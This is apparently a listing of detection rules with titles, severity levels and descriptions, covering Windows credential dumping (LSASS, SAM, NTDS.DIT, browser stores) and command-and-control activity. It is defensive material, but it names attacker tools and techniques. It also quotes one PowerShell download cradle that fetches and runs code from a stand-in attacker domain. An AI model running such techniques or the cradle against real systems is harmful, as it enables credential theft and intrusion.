Remote Thread Creation In Mstsc.Exe From Suspicious LocationhighDetects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.
Potential Credential Dumping Attempt Via PowerShell Remote ThreadhighDetects remote thread creation by PowerShell processes into "lsass.exe"
Password Dumper Remote Thread in LSASShighDetects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
Credential Manager Access By Uncommon ApplicationsmediumDetects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
Access To Crypto Currency Wallets By Uncommon ApplicationsmediumDetects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.
Access To Windows Credential History File By Uncommon ApplicationsmediumDetects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
Access To Windows DPAPI Master Keys By Uncommon ApplicationsmediumDetects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
Access To Potentially Sensitive Sysvol Files By Uncommon ApplicationsmediumDetects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
Microsoft Teams Sensitive File Access By Uncommon ApplicationsmediumDetects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
Cred Dump Tools Dropped FileshighFiles with well-known filenames (parts of credential dump software or files produced by them) creation
HackTool - CrackMapExec File IndicatorshighDetects file creation events with filename patterns used by CrackMapExec.
HackTool - Typical HiveNightmare SAM File ExporthighDetects files written by the different tools that exploit HiveNightmare
HackTool - Dumpert Process Dumper Default FilecriticalDetects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
HackTool - Mimikatz Kirbi File CreationcriticalDetects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
HackTool - NPPSpy Hacktool UsagehighDetects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
HackTool - QuarksPwDump Dump FilecriticalDetects a dump file written by QuarksPwDump password dumper
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-SecretsdumphighDetects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
HackTool - SafetyKatz Dump IndicatorhighDetects default lsass dump filename generated by SafetyKatz.
LSASS Process Memory Dump FileshighDetects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
LSASS Process Dump Artefact In CrashDumps FolderhighDetects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
WerFault LSASS Process Memory DumphighDetects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
NTDS.DIT CreatedlowDetects creation of a file named "ntds.dit" (Active Directory Database)
NTDS.DIT Creation By Uncommon Parent ProcesshighDetects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
NTDS.DIT Creation By Uncommon ProcesshighDetects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
NTDS Exfiltration Filename PatternshighDetects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Potential SAM Database DumphighDetects the creation of files that look like exports of the local SAM (Security Account Manager)
Suspicious PFX File CreationmediumA general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
LSASS Process Memory Dump Creation Via Taskmgr.EXEhighDetects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
Suspicious Renamed Comsvcs DLL Loaded By Rundll32highDetects rundll32 loading a renamed comsvcs.dll to dump process memory
CredUI.DLL Loaded By Uncommon ProcessmediumDetects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
Suspicious Unsigned Dbghelp/Dbgcore DLL LoadedhighDetects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
Time Travel Debugging Utility Usage - ImagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Unsigned Image Loaded Into LSASS ProcessmediumLoading unsigned image (DLL, EXE) into LSASS process
Uncommon Outbound Kerberos ConnectionmediumDetects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
HackTool - Koh Default Named PipecriticalDetects creation of default named pipes used by the Koh tool
HackTool - Credential Dumping Tools Named Pipe CreatedcriticalDetects well-known credential dumping tools execution via specific named pipe creation
Suspicious Get-ADDBAccount UsagehighDetects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Access to Browser Login DatamediumAdversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Powershell Install a DLL in System DirectoryhighUses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
Create Volume Shadow Copy with PowershellhighAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information
Dump Credentials from Windows Credential Manager With PowerShellmediumAdversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
Enumerate Credentials from Windows Credential Manager With PowerShellmediumAdversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
Certificate Exported Via PowerShell - ScriptBlockmediumDetects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
Suspicious Get-ADReplAccountmediumThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
HackTool - Rubeus Execution - ScriptBlockhighDetects the execution of the hacktool Rubeus using specific command line flags
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock | medium | Detects the execution of PowerShell scripts with calls to the "Start-NetEventSession" cmdlet, which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network traffic to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
Potential Invoke-Mimikatz PowerShell Script | high | Detects the Invoke-Mimikatz PowerShell script and similar. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.
PowerShell Credential Prompt | high | Detects PowerShell calling a credential prompt
Request A Single Ticket via PowerShell | high | Detects the use of native PowerShell Identity modules to query the domain and extract the Service Principal Names for a single computer. This behavior is typically used during a Kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.
Extracting Information with PowerShell | medium | Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
PowerShell Get-Process LSASS in ScriptBlock | high | Detects a Get-Process command on the lsass process, which is in almost all cases a sign of malicious activity
Potential Keylogger Activity | medium | Detects PowerShell scripts that contain references to keystroke capturing functions
Suspicious Connection to Remote Account | low | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
Veeam Backup Servers Credential Dumping Script Execution | high | Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class in order to dump stored credentials.
HackTool - Generic Process Access | high | Detects process access requests from hacktool processes based on their default image name
Lsass Memory Dump via Comsvcs DLL | high | Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump of lsass.
LSASS Memory Access by Tool With Dump Keyword In Name | high | Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
Potential Credential Dumping Activity Via LSASS | medium | Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is exhibited by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
Credential Dumping Activity By Python Based Tool | high | Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
Remote LSASS Process Access Through Windows Remote Management | high | Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping by tools like Mimikatz.
Suspicious LSASS Access Via MalSecLogon | high | Detects suspicious access to an LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.
Potentially Suspicious GrantedAccess Flags On LSASS | medium | Detects process access requests to the LSASS process with potentially suspicious access flags
Credential Dumping Attempt Via WerFault | high | Detects an LSASS process memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for Windows 10, Server 2016 and up.
LSASS Access From Potentially White-Listed Processes | high | Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
Potential Data Stealing Via Chromium Headless Debugging | high | Detects Chromium-based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
Browser Started with Remote Debugging | medium | Detects browsers starting with the remote debugging flags, which is a technique often used to perform browser injection attacks
Process Access via TrolleyExpress Exclusion | high | Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
New Generic Credentials Added Via Cmdkey.EXE | medium | Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via the command line interface.
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE | high | Detects usage of cmdkey to look for cached credentials on the system
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE | high | Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
VolumeShadowCopy Symlink Creation Via Mklink | high | Detects creation of a symbolic link to Shadow Copies storage using operating system utilities
Potential Windows Defender AV Bypass Via Dump64.EXE Rename | high | Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. Currently the rule only covers usage of procdump, but other utilities can be added in order to increase coverage.
Esentutl Gather Credentials | medium | Detects use of esentutl to access a dumped NTDS file, as recommended by Conti to its affiliates. TrickBot also uses this utility to get MSEdge info via its pwgrab module.
Copying Sensitive Files with Credential Data | high | Detects copying of files with well-known filenames (sensitive files with credential data)
Findstr GPP Passwords | high | Detects searching for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
LSASS Process Reconnaissance Via Findstr.EXE | high | Detects findstr commands that include the keyword lsass, which indicates recon activity for the LSASS process PID
Permission Misconfiguration Reconnaissance Via Findstr.EXE | medium | Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured file or folder permissions.
HackTool - ADCSPwn Execution | high | Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service
HackTool - Certify Execution | high | Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.
HackTool - Certipy Execution | high | Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command line arguments.
HackTool - CrackMapExec Execution | high | This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - CrackMapExec Process Patterns | high | Detects suspicious process patterns found in logs when CrackMapExec is used
HackTool - CreateMiniDump Execution | high | Detects the use of the CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
HackTool - Dumpert Process Dumper Execution | critical | Detects the use of the Dumpert process dumper, which dumps the lsass.exe process memory
Hacktool Execution - Imphash | critical | Detects the execution of different Windows-based hacktools via their import hash (imphash) even if the files have been renamed
Hacktool Execution - PE Metadata | high | Detects the execution of different Windows-based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
HackTool - HandleKatz LSASS Dumper Execution | high | Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to LSASS in order to create an obfuscated memory dump of the same
HackTool - Hashcat Password Cracker Execution | high | Detects execution of Hashcat.exe with a SAM file provided from the Windows registry and a password list to crack against
HackTool - Hydra Password Bruteforce Execution | high | Detects command line parameters used by the Hydra password guessing hack tool
HackTool - Inveigh Execution | critical | Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
HackTool - KrbRelay Execution | high | Detects the use of KrbRelay, a Kerberos relaying tool
HackTool - KrbRelayUp Execution | high | Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
HackTool - RemoteKrbRelay Execution | high | Detects the use of RemoteKrbRelay, a Kerberos relaying tool, via command line flags and PE metadata.
HackTool - LaZagne Execution | medium | Detects the execution of LaZagne, a utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
HackTool - Mimikatz Execution | high | Detects well-known Mimikatz command line arguments
HackTool - Pypykatz Credentials Dumping Activity | high | Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through the Windows registry where the SAM database is stored
HackTool - Quarks PwDump Execution | high | Detects usage of the Quarks PwDump tool via command line arguments
HackTool - Rubeus Execution | critical | Detects the execution of the hacktool Rubeus via PE information or command line parameters
HackTool - SafetyKatz Execution | critical | Detects the execution of the hacktool SafetyKatz via PE information and default image name
HackTool - SecurityXploded Execution | critical | Detects the execution of SecurityXploded Tools
HackTool - Windows Credential Editor (WCE) Execution | critical | Detects the use of Windows Credential Editor (WCE)
HackTool - WinPwn Execution | high | Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Microsoft IIS Service Account Password Dumped | high | Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
Microsoft IIS Connection Strings Decryption | high | Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command.
Dumping Process via Sqldumper.exe | medium | Detects a process dump via the legitimate sqldumper.exe binary
Time Travel Debugging Utility Usage | high | Detects usage of the Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Potential Credential Dumping Via LSASS Process Clone | critical | Detects a suspicious LSASS process clone that could be a sign of credential dumping activity
New Network Trace Capture Started Via Netsh.EXE | medium | Detects the execution of netsh with the "trace" flag in order to start a network capture
Harvesting Of Wifi Credentials Via Netsh.EXE | medium | Detects the harvesting of wifi credentials using netsh.exe
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) | medium | Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots, etc.
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) | medium | Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
PktMon.EXE Execution | medium | Detects execution of PktMon, a tool that captures network packets.
AADInternals PowerShell Cmdlets Execution - ProccessCreation | high | Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
Certificate Exported Via PowerShell | medium | Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
PowerShell Get-Process LSASS | high | Detects a "Get-Process" cmdlet and its aliases on the lsass process, which is in almost all cases a sign of malicious activity
PowerShell SAM Copy | high | Detects suspicious PowerShell scripts accessing SAM hives
PUA - DIT Snapshot Viewer | high | Detects the use of the Ditsnap tool, an inspection tool for the Active Directory database, ntds.dit.
PUA - Mouse Lock Execution | medium | In Kaspersky's 2020 Incident Response Analyst Report they listed the legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
PUA - WebBrowserPassView Execution | medium | Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
Process Memory Dump via RdrLeakDiag.EXE | high | Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
Enumeration for 3rd Party Creds From CLI | medium | Detects processes that query known 3rd party registry keys that hold credentials via the command line
Potential Credential Dumping Attempt Using New NetworkProvider - CLI | high | Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
Dropping Of Password Filter DLL | medium | Detects dropping of DLL files in system32 that may be used to retrieve user credentials from LSASS
Dumping of Sensitive Hives Via Reg.EXE | high | Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes the SAM, SYSTEM and SECURITY hives.
Suspicious Reg Add Open Command | medium | Detects dumping of the SAM, SECURITY and SYSTEM registry hives using the DelegateExecute key, as performed by threat actors
Enumeration for Credentials in Registry | medium | Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
Capture Credentials with Rpcping.exe | medium | Detects the use of Rpcping.exe to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Suspicious Key Manager Access | high | Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
Suspicious NTLM Authentication on the Printer Spooler Service | high | Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
Process Memory Dump Via Comsvcs.DLL | high | Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
Potential Suspicious Activity Using SeCEdit | medium | Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
Suspicious Serv-U Process Pattern | high | Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
Potential SPN Enumeration Via Setspn.EXE | medium | Detects service principal name (SPN) enumeration used for Kerberoasting
SQLite Chromium Profile Data DB Access | high | Detects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
SQLite Firefox Profile Data DB Access | high | Detects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
Automated Collection Command Prompt | medium | Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Potential Browser Data Stealing | medium | Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities | medium | Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from event logs such as usernames, IP addresses, hostnames, etc.
Potentially Suspicious JWT Token Search Via CLI | medium | Detects a possible search for JWT tokens via the CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by Microsoft Office and similar apps.
LSASS Dump Keyword In CommandLine | high | Detects the presence of the keywords "lsass" and ".dmp" in the command line, which could indicate a potential attempt to dump or create a dump of the lsass process.
Potential Network Sniffing Activity Using Network Tools | medium | Detects potential network sniffing via use of network tools such as "tshark" or "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Suspicious Process Patterns NTDS.DIT Exfil | high | Detects suspicious process patterns used in NTDS.DIT exfiltration
Private Keys Reconnaissance Via CommandLine Tools | medium | Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials
Shadow Copies Creation Using Operating Systems Utilities | medium | Detects Shadow Copies creation using operating system utilities, a possible sign of credential access
Suspicious SYSTEM User Process Creation | high | Detects a suspicious process creation as the SYSTEM user (suspicious program or command line parameter)
Suspicious SYSVOL Domain Group Policy Access | medium | Detects access to Domain Group Policies stored in SYSVOL
Active Directory Database Snapshot Via ADExplorer | medium | Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database.
Suspicious Active Directory Database Snapshot Via ADExplorer | high | Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database to a suspicious directory.
Potential LSASS Process Dump Via Procdump | high | Detects suspicious uses of the Sysinternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
Potentially Suspicious Command Targeting Teams Sensitive Files | medium | Detects a command line containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged-in accounts.
Windows Credential Manager Access via VaultCmd | medium | Detects listing of credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Sensitive File Dump Via Wbadmin.EXE | high | Detects the dump of highly sensitive files such as "NTDS.DIT" and the "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credentials or sensitive information.
Sensitive File Recovery From Backup Via Wbadmin.EXE | high | Detects the dump of highly sensitive files such as "NTDS.DIT" and the "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credentials or sensitive information.
Potential Credential Dumping Via WER | high | Detects potential credential dumping via the Windows Error Reporting LSASS Shtinkering technique, which uses Windows Error Reporting to dump lsass
Potential Windows Defender Tampering Via Wmic.EXE | high | Detects potential tampering with Windows Defender settings such as adding exclusions using wmic
Esentutl Volume Shadow Copy Service Keys | high | Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.
Windows Credential Editor Registry | critical | Detects the use of Windows Credential Editor (WCE)
Potential Credential Dumping Via LSASS SilentProcessExit Technique | critical | Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
Lsass Full Dump Request Via DumpType Registry Settings | high | Detects the setting of the "DumpType" registry value to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.
Potential Credential Dumping Attempt Using New NetworkProvider - REG | medium | Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
NotPetya Ransomware Activity | critical | Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via a named pipe, the file system journal of drive C is deleted and Windows event logs are cleared using wevtutil
APT31 Judgement Panda Activity | critical | Detects APT31 Judgement Panda activity as described in the CrowdStrike 2019 Global Threat Report
Potential Russian APT Credential Theft Activity | critical | Detects Russian group activity as described in the Global Threat Report 2019 by CrowdStrike
GALLIUM IOCs | high | Detects artifacts associated with the GALLIUM cyber espionage group as reported by the Microsoft Threat Intelligence Center in the December 2019 report.
GALLIUM Artefacts - Builtin | high | Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum | critical | Detects patterns as noticed in exploitation of the Windows CVE-2021-31979 and CVE-2021-33771 vulnerabilities and the DevilsTongue malware by threat group Sourgum
CVE-2021-31979 CVE-2021-33771 Exploits | critical | Detects patterns as noticed in exploitation of the Windows CVE-2021-31979 and CVE-2021-33771 vulnerabilities and the DevilsTongue malware by threat group Sourgum
Potential CVE-2021-42278 Exploitation Attempt | medium | The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can make many changes to the object.
CVE-2023-23397 Exploitation Attempt | critical | Detects Outlook initiating a connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
Okta 2023 Breach Indicator Of Compromise | medium | Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate usernames used in your environment.
User with Privileges Logon | low | Detects logons with "Special groups" and "Special Privileges", which can be thought of as Administrator groups or privileges.
Remote Registry Management Using Reg Utility | medium | Detects remote registry management using the REG utility from a non-admin workstation
Okta Password Health Report Query | low | Detects all activities against the endpoint "/reports/password-health/*", which should only be accessed via the Okta Admin Console UI. Use this rule to hunt for potentially suspicious requests. Correlate this event with "admin console" logins and alert on requests without any corresponding admin console login
Clipboard Data Collection Via Pbpaste | medium | Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
Access To Browser Credential Files By Uncommon Applications - Security | low | Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. This rule requires heavy baselining before usage.
Access To Browser Credential Files By Uncommon Applications | low | Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. Requires heavy baselining before usage
Access To Chromium Browsers Sensitive Files By Uncommon Applications | low | Detects file access requests to Chromium-based browser sensitive files by uncommon processes. Could indicate a potential attempt at stealing sensitive information.
Access To Sysvol Policies Share By Uncommon Process | medium | Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
Unattend.XML File Access Attempt | low | Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended Windows install process.
Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process | medium | Detects the load of the dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, the SILENTTRINITY C2 framework has a module that leverages this API to dump the contents of lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
Potential Credential Dumping Attempt Via PowerShell | medium | Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts
LSASS Access From Program In Potentially Suspicious Folder | medium | Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder
Uncommon GrantedAccess Flags On LSASS | medium | Detects process access to LSASS memory with the uncommon access flags 0x410 and 0x01410
Potential Password Reconnaissance Via Findstr.EXE | medium | Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
EventLog Query Requests By Builtin Utilities | medium | Detects attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
Sign-in Failure Bad Password Threshold | high | Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.
Failed Logins with Different Accounts from Single Source - Linux | medium | Detects suspicious failed logins with different user accounts from a single source system
Mimikatz In-Memory | medium | Detects certain DLL loads when Mimikatz gets executed
Stored Credentials in Fake Files | high | Detects access to fake files with stored credentials
Dumping ntds.dit remotely via DCSync | medium | Detects retrieval of ntds.dit via synchronisation with a legitimate domain controller using the Directory Replication Service Remote Protocol
Dumping ntds.dit remotely via NetSync | medium | Detects retrieval of ntds.dit (computer accounts only) via synchronisation with a legitimate domain controller using the Netlogon Remote Protocol
Possible Remote Password Change Through SAMR | medium | Detects a possible remote NTLM hash change through the SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see these events.
attack.command_and_control 271
Title | Level | Description
Domestic Kitten FurBall Malware Pattern | high | Detects specific malware patterns used by FurBall malware linked to the Iranian Domestic Kitten APT group
CobaltStrike Malleable Amazon Browsing Traffic Profile | high | Detects Malleable Amazon Profile
CobaltStrike Malformed UAs in Malleable Profiles | critical | Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
CobaltStrike Malleable (OCSP) Profile | high | Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
CobaltStrike Malleable OneDrive Browsing Traffic Profile | high | Detects Malleable OneDrive Profile
Microsoft Binary Github Communication | high | Detects an executable in the Windows folder accessing github.com
Suspicious Non-Browser Network Communication With Reddit API | medium | Detects a non-browser process interacting with the Reddit API, which could indicate use of a covert C2 such as RedditC2
Netcat The Powershell Version - PowerShell Module | medium | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
GALLIUM Artefacts | high | Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
Suspicious Certutil Command Usage | high | Detects a suspicious Microsoft certutil execution with sub commands like 'decode', which is sometimes used to decode malicious code
DNS Tunnel Technique from MuddyWater | critical | Detects DNS tunnel activity of the MuddyWater actor
Suspicious File Download Using Office Application | high | Detects the usage of one of three Microsoft Office applications (Word, Excel, PowerPoint) to download arbitrary files
Nslookup PwSh Download Cradle | medium | This rule tries to detect PowerShell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
Windows Update Client LOLBIN | high | Detects code execution via the Windows Update client (wuauclt)
OpenCanary - Telnet Login Attempt | high | Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
